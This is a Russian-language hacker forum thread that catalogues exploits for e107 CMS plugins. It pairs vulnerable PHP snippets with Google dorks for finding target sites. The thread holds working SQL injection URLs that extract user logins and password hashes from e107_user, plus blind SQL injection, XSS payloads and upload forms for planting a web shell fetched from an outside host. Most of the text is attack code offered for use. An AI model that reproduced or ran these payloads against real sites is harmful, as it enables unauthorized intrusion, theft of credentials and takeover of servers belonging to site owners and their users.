Не знаю было или не, но пишу: скачал Plugins > E-Commerce > Notice Board на plugins.e107.org [скачать] Author sunout Date 13:10 14-May-10 дорк: inurl:e107_plugins/nboard e107_plugins/nboard/viewads.php PHP: require_once("../../class2.php"); require_once(e_HANDLER."form_handler.php"); require_once(e_HANDLER."userclass_class.php"); @include_once(e_PLUGIN."nboard/languages/".e_LANGUAGE.".php"); $ns = new e107table; require_once(HEADERF); require_once("classmen.php"); $uspage = e_BASE; $scat = $_GET['scat']; $act = $_GET["act"]; //==================================Debug======================================= if ($act == "det"){ $text .="<table>"; $sql -> db_Select("nb_gnl", "*", "gnl_id='$scat' "); while($row = $sql -> db_Fetch()){ $gnl_id = $row['gnl_id']; $gnl_name = $row['gnl_name']; $gnl_city = $row['gnl_city']; $gnl_picbig=$row['gnl_picbig']; $gnl_small = $row['gnl_picsmall']; $gnl_detail = $row['gnl_detail']; $gnl_user = $row['gnl_user']; $gnl_phone = $row['gnl_phone']; $gnl_email = $row['gnl_email']; $gnl_date = $row['gnl_date']; $gnl_price = $row['gnl_price']; $gnl_kikoz = $row['gnl_kikoz']; /*...*/ ////вывод где то там } $text .="</table>"; $caption = NB_NAME_6; $ns -> tablerender($caption, $text); require_once(FOOTERF); екплоенг: Code: http://localhost/e107/e107_plugins/nboard/viewads.php?act=det&scat=1%27%20and%200%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+ условие mg=0ff e107_plugins/nboard/nboard.php PHP: /*...*/ $cat = $_GET['cat']; $scat = $_GET['scat']; $page = $_GET["page"] /*...*/ //====================== all_select ============================// function sql_cat($onpage, $page, $cat, $table){ $begin = $page*$onpage; // откуда начинать $sql = "SELECT * FROM ".$table." WHERE gnl_scatid in (select subcat_id from ".MPREFIX."nb_subcat where subcat_catid=$cat) ORDER BY gnl_id DESC LIMIT ".$begin.", ".$onpage; $result_cat = mysql_query($sql) or die(mysql_error()); return $result_cat; echo $result_cat; } /*...*/ $onpage = 40; // записей на страницу $table = "".MPREFIX."nb_gnl"; // из какой таблицы $page = page(); // определяем страницу $result = sql_result($onpage, $page, $table, $gnl_pigbig); $result_cat = sql_cat($onpage, $page, $cat, $table, $gnl_pigbig); $result_scat = sql_scat($onpage, $page, $scat, $table, $gnl_pigbig); /*...*/ Теперь никаких условий должно быть, кстате там подзапрос, тоесть со скобкой вылазить надо. Еще есть одна SQL inj в файле, но mg=off надо. Запарилсо добиватца вывода и кнопать => Если нет значения в nb_cat, то уязвимость неексплуатируемая. У кого есть желание смотрите. короче через ошибку: Code: http://localhost/e107/e107_plugins/nboard/nboard.php?cat=1%29%20and%201=%28select%201%20from%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20%20concat_ws%280x3a,user_loginname,user_password%29%20from%20e107_user%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%29y%29--+
1 pXSS nlstart uploaded EasyShop v1.54 26Aug10 скачать http://[host]/[path]/e107_plugins/easyshop/easyshop_sql.php - стурктура БД плагина /e107_plugins/easyshop/easyshop_basket.php PHP: /*...*/ // Filling basket from product = P; return to product overview if ($_POST['fill_basket'] == 'C' or $_POST['fill_basket'] == 'P') { // refresh_cart(); // IPN addition // might screw up the session variables // IPN addition - sets two variables to help keep coding neat later on isset($_POST['item_id'])? $action_id=$_POST['item_id']: NULL; isset($_SESSION['shopping_cart'][$action_id]['item_track_stock']) && ($_SESSION['shopping_cart'][$action_id]['quantity']) < ($_SESSION['shopping_cart'][$action_id]['item_instock'])? $allow_add = TRUE: $allow_add = NULL; isset($_SESSION['shopping_cart'][$action_id]['item_track_stock'])? $track_stock = TRUE: $track_stock = NULL; // Fill the basket with selected product if (!array_key_exists($_POST['item_id'], $_SESSION['shopping_cart'])) { // Key for item id does not exists; item needs to be added to the array $_SESSION['shopping_cart'][$_POST['item_id']] = array('item_name'=>$_POST['item_name'], 'quantity'=>$_POST['item_qty'], 'item_price'=>$_POST['item_price'], 'sku_number'=>$_POST['sku_number'], 'shipping'=>$_POST['shipping'], 'shipping2'=>$_POST['shipping2'], 'handling'=>$_POST['handling'], 'db_id'=> $_POST['db_id']); // Handling costs are calculated once per each basket $_SESSION['sc_total']['handling'] += (double)$_POST['handling']; // IPN addition - check to see if we're tracking stock, if so put stock amount into SESSION ARRAY if ($_POST['item_track_stock'] == 2){ $_SESSION['shopping_cart'][$_POST['item_id']]['item_instock'] = $_POST['item_instock']; $_SESSION['shopping_cart'][$_POST['item_id']]['item_track_stock'] = $_POST['item_track_stock']; } } else if (!isset($track_stock) || isset($allow_add)){ // IPN addition check quantity against item_instock // Key for item id does exist; only quantity needs to raised $_SESSION['shopping_cart'][$_POST['item_id']]['quantity'] += $_POST['item_qty']; } if (!isset($track_stock) || isset($allow_add)){ // IPN addition - don't increment if quantity is at max stock level // Fill the sc_total array $previous_nr_of_items = $_SESSION['shopping_cart']['item_id']['quantity']; // Fix bug #88 $_SESSION['sc_total']['items'] += $_POST['item_qty']; $_SESSION['sc_total']['sum'] += (double)$_POST['item_price'] * $_POST['item_qty']; // Extra shippings costs are conditioned (only calculate for first product) if ((integer)($_SESSION['shopping_cart'][$_POST['item_id']]['quantity']) >= 1 and $previous_nr_of_items == 0) { // Fix bug #81 $_SESSION['sc_total']['shipping'] += (double)$_POST['shipping']; } // PayPal charges shipping2 costs for all items above quantity of 2 if ((integer)($_SESSION['shopping_cart'][$_POST['item_id']]['quantity']) > 1) { if ($previous_nr_of_items == 0) { $_SESSION['sc_total']['shipping2'] += (double)$_POST['shipping2'] * ($_POST['item_qty']-1); } else { $_SESSION['sc_total']['shipping2'] += (double)$_POST['shipping2'] * $_POST['item_qty']; } } } // Close the session (before a location redirect: otherwise the variables may not display correctly) session_write_close(); // Return to original url header("Location: ".$_POST['return_url']); exit(); } HTML: <form name="" action="http://e107/e107_plugins/easyshop/easyshop_basket.php" method="post"> <input name="fill_basket" type="hidden" value="C"> <input name="return_url" type="hidden" value="data:text/html;base64,PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ+"> <input type="submit" value="Send"> </form> зы 5 минут поиска!
FileDownload Advanced v2.0 by The Hunter скачать гугл- inurl:e107_plugins/FileDownload http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php PHP: require_once("config.php"); require_once("functions.php"); if ($_GET["dir"]) $dir = $_GET["dir"]; else $dir = $_POST["dir"]; if ($_POST["numfiles"]) $numfiles = $_POST["numfiles"]; else $numfiles = 4; if ((isset($_POST["hide"])) and (isset($dir))) { for ($x = 1; $_POST["file".$x]; $x++) { $file = $_POST["file".$x]; $copy = copy($file,$dir."/".getFileName($file)); $upload_ok .= "<tr><td style='width:100%' colspan=8 class='header2'>Uploaded:" . getFileName($file) . " successfully.</td></tr>"; } } ./config.php PHP: //$expPrefPass=''; $expBaseDir='../'; $expSortOrder=0; $expDisplaySearch... Как видно первая строка закоментирована. ... ./functions PHP: require_once("config.php"); if (isset($_COOKIE["phpFileDownload_login"])) if ($_COOKIE["phpFileDownload_login"] != $expPrefPass) header ("location: login.php");... И посему нет никакой переадресации если куки не устанавливать. ): ...function getFileName ($file) { $strlen = strlen($file); $retfile = ""; while ($strlen > 0) { $_g = substr(substr($file, $strlen, strlen($file)), 0, 1); if (($_g == "\\") or ($_g == "/")) break; $retfile = substr($file, $strlen, strlen($file)); $strlen = $strlen-1; } return $retfile; }... Результат: Заливаем на хостинг шелл или с своего розшареного. Посылаем запрос: <form action="http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php" method=post> <input type=hidden name=hide value=0><br> <input type=text name="file1" value='http://[host2]/[path]/shell.php'><br> <input type=text name=dir value=log><br> <input type=submit> </form> Наш шелл: http://[host]/[path]/FileDownload/filedownload/log/shell.php ps др. способы заливки TiltViewer v1.2 by The_Death_Raw Если уставновлен,то повезло. скачать Заливаем шельца! гугл- inurl:e107_plugins/tiltviewer http://[host]/[path]/e107_plugins/tiltviewer/gestion_fichiers.php PHP: ...// fonction upload foreach ($_FILES["filez"]["error"] as $key => $error) { if ($error == UPLOAD_ERR_OK) { $tmp_name = $_FILES["filez"]["tmp_name"][$key]; $name = $_FILES["filez"]["name"][$key]; move_uploaded_file($tmp_name, "./uploads/$name"); Header("Location: ".$_SERVER['PHP_SELF'].""); }... Выбираем наш шелл и Send the files http://[host]/[path]/e107_plugins/tiltviewer/uploads/name_our_shell.php ps заходил под админом и тогда лил, хоть и нужны права но мб пригодиться др. способы заливки AACGC Hall of Shame v1.6 by ~M@CH!N3~ 07:27 02-Apr-10 скачать Blind SQL inj гугл- inurl:e107_plugins/aacgc_hos [path]/e107_plugins/aacgc_hos/HOS_Details.php PHP: ...require_once("../../class2.php"); require_once(HEADERF); if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } //------------------------------------------------------------------------------------------------------------ $text .= "<center><table style='width:90%' class='indent' cellspacing='' cellpadding=''>"; $sql->db_Select("aacgc_hos", "*", "WHERE hos_id = $sub_action",""); $row = $sql->db_Fetch();... плюс - никаких условий. минус - надо знать hos_id. Результат: Пусть hos_id=1 и 5 ветка http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=5 - есть контент! http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=4 - нет контента! ps с "+" контент не выводился (если в гет пихать)
Проверял только на 0.7.22 и 0.7.23 Не совсем уязвимость, но можно запороть любой коментарий, будь то на форуме, лс или коментарий к пользователю и к новости. достаточно вставить Code: [img onload=document.location.href=0x687474703a2f2f676f6f676c652e7275]http://host/e107_images/generic/bbcode/image.png[/img] 0x687474703a2f2f676f6f676c652e7275 - это захекшеный гугл, вставить можно любое ©by sw3n
AACGC Friend System v.1.1 - плагин e107 скачать с plugins.e107.org inurl:/e107_plugins/aacgc_friendsys/ Path disclosure display_errors = on PoC Code: http://[host]/[path]//e107_plugins/aacgc_friendsys/admin_menu.php http://[host]/[path]/e107_plugins/aacgc_friendsys/User_Friend_List_menu.php SQL inj magic_quotes_gpc = Off, нужно быть авторизированым. /e107_plugins/aacgc_friendsy/Friend_Requests.php PHP: /*...*/ if (USER){ if ($pref['fl_enable_gold'] == "1") {$gold_obj = new gold();} /*...*/ if (isset($_POST['accept_user'])){ $newuser = $_POST['user_id']; $newfriend = $_POST['user_friends']; /*...*/ $sql->db_Insert("aacgc_friend_sys", "NULL, '".$newuser."', '".$newfriend."'") or die(mysql_error()); /*...*/ /e107_handlers/mysql_class.php PHP: /*...*/ function db_Insert($table, $arg, $debug = FALSE, $log_type = '', $log_remark = '') { $table = $this->db_IsLang($table); $this->mySQLcurTable = $table; if(is_array($arg)) { $keyList= "`".implode("`,`", array_keys($arg))."`"; $valList= "'".implode("','", $arg)."'"; $query = "INSERT INTO `".MPREFIX."{$table}` ({$keyList}) VALUES ({$valList})"; } else { $query = 'INSERT INTO '.MPREFIX."{$table} VALUES ({$arg})"; } if(!$this->mySQLaccess) { global $db_ConnectionID; $this->mySQLaccess = $db_ConnectionID; } if ($result = $this->mySQLresult = $this->db_Query($query, NULL, 'db_Insert', $debug, $log_type, $log_remark )) { $tmp = mysql_insert_id($this->mySQLaccess); return ($tmp) ? $tmp : TRUE; // return true even if table doesn't have auto-increment. } else { $this->dbError("db_Insert ($query)"); return FALSE; } } /*...*/ PoC Code: <form action=http://[host]/[path]/e107_plugins/aacgc_friendsys/Friend_Requests.php method=post> <input name=user_id type=text value="1',(select count(*) from (select 1 union select 2 union select 3)x group by concat((select concat_ws(':',user_loginname, user_password) from e107_user limit 0,1 ),floor(rand(0)*2))))#"> <input type=submit name=accept_user value=Send> </form> SQL inj надо быть авторизированым. /e107_plugins/aacgc_friendsys/AddMe.php Code: require_once("../../class2.php"); require_once(HEADERF); if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } if (USER){ $sql->db_Select("aacgc_friend_sys", "*", "WHERE user_id = ".USERID."",""); $row = $sql->db_Fetch(); $sql2 = new db; $sql2->db_Select("user", "*", "WHERE user_id = $sub_action ",""); $row2 = $sql2->db_Fetch(); print_r($row2); //---------------------------------------------- /*...*/ $text .= "<center> <form method='POST' action='AddMe.php?det.".$row2['user_id']."'> <table style='' class='indent'><tr> <td> <input type='hidden' name='user_friends_request' value='".USERID."'> <input type='hidden' name='user_id' value='".$row2['user_id']."'> </td> </tr> <tr> <td> <i>Are You Sure You Want To Add</i> <b>".$row2['user_name']."</b> <i>To Your Friends List?</i> "; /*...*/ Poc: Code: http://[host]/[path]/e107_plugins/aacgc_friendsys/AddMe.php?0.1%20and%200%20union%20select%201,concat_ws%280x3a,user_loginname,user_password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20e107_user%20limit%200,1
AACGC Wish List http://plugins.e107.org/ SQL Injection: /News_Details.php PHP: ... $sql ->db_Select("aacgc_pnews", "*", "WHERE news_id = ".$sub_action."",""); ... Пример: Code: http://e107/e107_plugins/aacgc_pnews/News_Details.php?det.-42%20union%20select%201,concat_ws(0x3a,user_loginname,user_password),3,4,5,6,7,8%20from%20e107_user%20limit%200,1 /News.php PHP: ... $sql ->db_Select("aacgc_pnews_cat", "*", "WHERE news_cat_id = ".$sub_action."",""); $row = $sql ->db_Fetch(); $newscatid = $row['news_cat_id']; ... $sql2->mySQLresult = @mysql_query("select * from ".MPREFIX."aacgc_pnews where news_cat=".$newscatid." ORDER BY news_date DESC;"); ... Пример: Code: http://e107/e107_plugins/aacgc_pnews/News.php?det.-2%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user Путь: http://e107/e107_plugins/aacgc_pnews/e_latest.php http://e107/e107_plugins/aacgc_pnews/e_status.php http://e107/e107_plugins/aacgc_pnews/pnews_singlecat_menu.php Дорк:inurl:e107_plugins/aacgc_pnews/ Если боян - извиняйте.
AACGC Arcade Addons V3.3 SQL Injection: /Category.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp);} ... $sql->mySQLresult = @mysql_query("SELECT * FROM ".MPREFIX."arcade_categories WHERE cat_id = $sub_action"); ... Пример: Code: http://e107games.net/e107_plugins/aacgc_arcade_addins/Category.php?det.-1%20union%20select%201,2,3,4,5,6-- Путь: http://e107/e107_plugins/aacgc_arcade_addins/Alternate_Arcade_Main_menu.php http://e107/e107_plugins/aacgc_arcade_addins/Arcade_Champ_menu.php http://e107/e107_plugins/aacgc_arcade_addins/Arcade_Favorites_menu.php http://e107/e107_plugins/aacgc_arcade_addins/Challenge_Champ_menu.php etc... Дорк:inurl:e107_plugins/aacgc_arcade_addins/ Если боян - извиняйте.
AACGC CMMS v1.2 Необохдимы права администратора, SQL Injection: /admin_edit_cat.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $id = $tmp[1]; unset($tmp); } ... $sql->db_Select("aacgc_bt_cat", "*", "cat_id = $id"); ... $sql->mySQLresult = @mysql_query("SELECT * FROM ".MPREFIX."arcade_categories WHERE cat_id = $sub_action"); ... Пример: Code: http://e107/e107_plugins/aacgc_btracker/admin_edit_cat.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user-- SQL Injection: /Bracket_Details.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql->db_Select("aacgc_bt_cat", "*", "WHERE cat_id=$sub_action",""); ... Пример: Code: http://e107/e107_plugins/aacgc_btracker/Bracket_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user-- Путь: http://e107/e107_plugins/aacgc_btracker/admin_menu.php Дорк:inurl:e107_plugins/aacgc_btracker/
AACGC Tracker V1.2 Необохдимы права администратора, SQL Injection: /admin_edit_cat.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $id = $tmp[1]; unset($tmp); } ... $sql->db_Select("aacgc_tracker_cat", "track_cat_id, track_cat_name", "track_cat_id = $id"); ... Пример: Code: http://e107/e107_plugins/aacgc_tracker/admin_edit_cat.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user-- SQL Injection: /Tracker.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql->db_Select("aacgc_tracker", "*", "WHERE track_cat=$sub_action",""); ... Пример: Code: http://e107/e107_plugins/aacgc_tracker/Tracker.php?det.-1%20union%20select%201,2,3,concat_ws(0x3a,user_name,user_password),5,6%20from%20e107_user-- SQL Injection: /Tracker_Details.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql3->db_Select("aacgc_tracker", "*", "WHERE track_id=$sub_action", ""); ... Пример: Code: http://e107/e107_plugins/aacgc_tracker/Tracker_Details.php?det.-1%20union%20select%201,2,3,concat_ws(0x3a,user_name,user_password),5,6%20from%20e107_user-- Путь: http://e107/e107_plugins/aacgc_tracker/admin_menu.php Дорк:inurl:e107_plugins/aacgc_tracker/
AACGC MIA List V1.3 Необохдимы права администратора, SQL Injection: /admin_edit.php PHP: ... if ($action == "edit") { $sql->db_Select("aacgc_mialist", "*", "WHERE mia_id=$id",""); $row = $sql->db_Fetch(); $sql2 = new db; $sql2->db_Select("user", "*", "WHERE user_id=".$row['mia_user']."",""); $row2 = $sql2->db_Fetch(); $sql3 = new db; $sql3->db_Select("user", "*"); $rows = $sql3->db_Rows(); for ($i=0; $i < $rows; $i++) { $option = $sql3->db_Fetch(); $options .= "<option name='mia_user' value='".$option['user_id']."'>".$option['user_name']."</option>";} ... Пример: Code: http://e107/e107_plugins/aacgc_mialist/admin_edit.php?edit.-1%20union%20select%20concat_ws(0x3a,user_name,user_password),2222,3333%20from%20e107_user%20limit%200,1-- Вывод внизу в исходнике Путь: http://e107/e107_plugins/aacgc_mialist/MIA_List_menu.php http://e107/e107_plugins/aacgc_mialist/admin_menu.php Дорк:inurl:e107_plugins/aacgc_mialist/
AACGC Trophy Room V1.5 Необохдимы права администратора, SQL Injection: /admin_edit_event.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $id = $tmp[1]; unset($tmp); } ... if ($action == "edit") { $sql->db_Select("aacgc_trophy_room", "*", "event_id = $id"); $row = $sql->db_Fetch(); ... Пример: Code: http://e107/e107_plugins/aacgc_trophy_room/admin_edit_event.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5%20from%20e107_user-- SQL Injection: /Event_Details.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } } ... $sql->db_Select("aacgc_trophy_room", "*", "WHERE event_id = $sub_action",""); $row = $sql->db_Fetch(); ... Пример: Code: http://e107/e107_plugins/aacgc_trophy_room/Event_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5%20from%20e107_user-- Путь: http://e107/e107_plugins/aacgc_trophy_room/admin_menu.php Дорк:inurl:e107_plugins/aacgc_trophy_room/
AACGC Clan Listing V2.0 Необохдимы права администратора, SQL Injection: /admin_edit.php PHP: ... $sql->db_Select("clan_listing", "*", "ORDER BY clan_id ASC",""); while($row = $sql->db_Fetch()){ $sql2->db_Select("clan_listing_cat", "*", "WHERE clan_cat_id=".$row['clan_cat']."",""); ... Пример: Code: http://e107/e107_plugins/clan_listing/admin_edit.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6%20from%20e107_user-- SQL Injection: /Clans.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql->db_Select("clan_listing_cat", "*", "WHERE clan_cat_id=$sub_action",""); $catname = $sql->db_Fetch(); ... Пример: Code: http://e107/e107_plugins/clan_listing/Clans.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6%20from%20e107_user-- Путь: http://e107/e107_plugins/clan_listing/admin_menu.php Дорк:inurl:e107_plugins/clan_listing/
AACGC Product Listing V1.4 SQL Injection: /Product_Sub_Categories.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql->db_Select("product_listing_subcat", "*", "WHERE product_cat=$sub_action ORDER BY product_subcat_name ASC",""); while($row = $sql->db_Fetch()){ ... Пример: Code: http://e107/e107_plugins/product_listing/Product_Sub_Categories.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user-- SQL Injection: /Products.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql->db_Select("product_listing", "*", "WHERE product_cat=$sub_action",""); ... Пример: Code: http://e107/e107_plugins/product_listing/Products.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4%20from%20e107_user-- Путь: http://e107/e107_plugins/product_listing/Product_Listing_menu.php http://e107/e107_plugins/product_listing/admin_menu.php Дорк:inurl:e107_plugins/product_listing/
AACGC Item List V1.4 SQL Injection: /Item_List.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... if ($action == "det"){ $sql2->db_Select("aacgc_itemlist_cat", "*", "WHERE item_cat_id=$sub_action",""); $row2 = $sql2->db_Fetch(); ... Пример: Code: http://e107/e107_plugins/aacgc_itemlist/Item_List.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user-- SQL Injection: /Item_SubCategories.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... if ($action == "det"){ $sql2->db_Select("aacgc_itemlist_subcat", "*", "WHERE item_subcat_id=$sub_action",""); ... Пример: Code: http://e107/e107_plugins/aacgc_itemlist/Item_SubCategories.php?det.-1%20union%20select%201,2,concat_ws(0x3a,user_name,user_password),4%20from%20e107_user-- Путь: http://e107/e107_plugins/aacgc_itemlist/admin_menu.php http://e107/e107_plugins/aacgc_itemlist/Recent_Items_menu.php http://e107/e107_plugins/aacgc_itemlist/Random_Item_menu.php Дорк:inurl:e107_plugins/aacgc_itemlist/
AACGC Public News V1.4 SQL Injection: /News.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql ->db_Select("aacgc_pnews_cat", "*", "WHERE news_cat_id = ".$sub_action."",""); ... Пример: Code: http://e107/e107_plugins/aacgc_pnews/News.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user-- SQL Injection: /News_Details.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql ->db_Select("aacgc_pnews", "*", "WHERE news_id = ".$sub_action."",""); $row = $sql ->db_Fetch(); ... Пример: Code: http://e107/e107_plugins/aacgc_pnews/News_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8%20from%20e107_user-- Путь: http://e107/e107_plugins/aacgc_pnews/pnews_singlecat_menu.php http://e107/e107_plugins/aacgc_pnews/pnews_menu.php http://e107/e107_plugins/aacgc_pnews/pnews_category_menu.php http://e107/e107_plugins/aacgc_pnews/pnews_archive_menu.php http://e107/e107_plugins/aacgc_pnews/e_latest.php http://e107/e107_plugins/aacgc_pnews/counter.php etc... Дорк:inurl:e107_plugins/aacgc_pnews/
AACGC Donation Listing V1.7 Необходимы права администратора, SQL Injection: /admin_edit_donator.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $id = $tmp[1]; unset($tmp); } ... if ($action == "edit") { $sql->db_Select("donation_listing", "*", "WHERE don_id= $id",""); $row = $sql->db_Fetch(); ... Пример: Code: http://e107/e107_plugins/donation_listing/admin_edit_donator.php?edit.-1%20union%20select%201,2,database(),4,5,6 Необходимы права администратора, SQL Injection: /admin_edit_month.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... if ($action == "edit") { $sql->db_Select("donation_listing_month", "month_id, month_name, year", "month_id = $id"); $row = $sql->db_Fetch(); $sql2 = new db; $sql2->db_Select("donation_listing_year", "*"); $rows = $sql2->db_Rows(); for ($i=0; $i < $rows; $i++) { $option = $sql2->db_Fetch(); $options .= "<option name='year' value='".$option['year_id']."'>".$option['year_name']."</option>";} ... Пример: Code: http://e107/e107_plugins/donation_listing/admin_edit_month.php?edit.-1%20union%20select%201,database(),3 Путь: http://e107/e107_plugins/donation_listing/Current_Donations_menu.php http://e107/e107_plugins/donation_listing/Latest_Donations_menu.php http://e107/e107_plugins/donation_listing/admin_menu.php Баги никому не нужные, но всё же..
Election v0.5 SQL Injection: /election.php (election_class.php) PHP: ... $candidatelist = $dao->getCandidateList($election->getId()); ... if ($sql->db_Select("user", "user_id, user_name, user_login")) { while ($row = $sql->db_Fetch()) { $owners[] = array($row["user_id"], $row["user_name"]." (".$row["user_login"].")"); } ... Пример: Code: http://e107/e107_plugins/election/election.php?1.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20e107_user-- Путь: http://e107/e107_plugins/election/admin_menu.php http://e107/e107_plugins/election/e_comment.php http://e107/e107_plugins/election/e_search.php Дорк:inurl:e107_plugins/election/
RSS Reader v1.10 Blind SQL Injection: /include/getrss.php PHP: ... $q=$_GET["q"]; ... $sql->DB_Select("rss_reader","rss_feed_addr","rss_feed_id=".$q); ... Пример: Code: http://e107/e107_plugins/rss_reader/include/getrss.php?q=2%20and%20substring(version(),1,1)=5 Путь: http://e107/e107_plugins/rss_reader/admin_menu.php Дорк:inurl:e107_plugins/rss_reader/
Yellow Pages v2.0 b1 SQL Injection: /yellowpages.php Пример: Code: http://e107/e107_plugins/yellowpages/yellowpages.php?1.-2%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12%20from%20e107_user-- Путь: http://e107/e107_plugins/yellowpages/admin_menu.php http://e107/e107_plugins/yellowpages/admin_prefs_90.php http://e107/e107_plugins/yellowpages/admin_update.php http://e107/e107_plugins/yellowpages/e_list.php http://e107/e107_plugins/yellowpages/e_search.php etc.. Дорк:inurl:e107_plugins/yellowpages/
Tutor Locator v1.1 XSS: /tutor.php PHP: { $pid = (IsSet($_POST['pid']) ? $_POST['pid'] : 0); $tmp = explode(".", e_QUERY); $tutor_from = intval($tmp[0]); $tutor_action = "item"; $tutor_itemid = intval($tmp[4]); $tutor_com->enter_comment($_POST['author_name'], $_POST['comment'], "tutor", $tutor_itemid, $pid, $_POST['subject']); // print $tutor_action.$tutor_itemid; } Снизу есть форма отправки комментария, вписываем "<script>alert('xss')</script>" и.. любуемся. Путь: http://e107/e107_plugins/tutor/tutor_top_menu.php Дорк:inurl:e107_plugins/tutor/